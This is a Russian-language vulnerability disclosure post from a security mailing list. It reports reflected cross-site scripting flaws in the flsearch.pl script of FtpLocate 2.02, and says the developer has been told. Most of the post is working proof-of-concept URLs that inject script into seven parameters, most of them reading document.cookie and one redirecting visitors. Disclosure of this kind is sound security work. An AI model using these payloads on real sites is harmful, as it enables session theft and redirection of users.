Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include

Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	16.03.2007
Subject:	Vulnerabilities в FtpLocate

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною 12.10.2006 Cross-Site Scripting уязвимостях в FtpLocate - движке поиска по ftp серверам.

Уязвимости в скрипте flsearch.pl в параметрах all, query, nounix, sizemin, sizemax, sizeunit и sizebytes.

XSS:

http://site/cgi-bin/ftplocate/flsearch.
pl?all=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&query=test

http://site/cgi-bin/ftplocate/flsearch.
pl?query=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.
pl?query=test&nounix=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.
pl?query=test&sizemin=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.
pl?query=test&sizemax=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.
pl?query=test&sizeunit=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.
pl?query=test&sizebytes=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.
pl?query=test&sizebytes=%22%3E%3Cscript%3Edocument.
location%3D'http://websecurity.com.ua'%3C/script%3E

Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/706/
Данные уязвимости имеют место в версии FtpLocate 2.02 (и возможно предыдущих). О найденных уязвимостях я уже сообщил разработчику приложения.

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua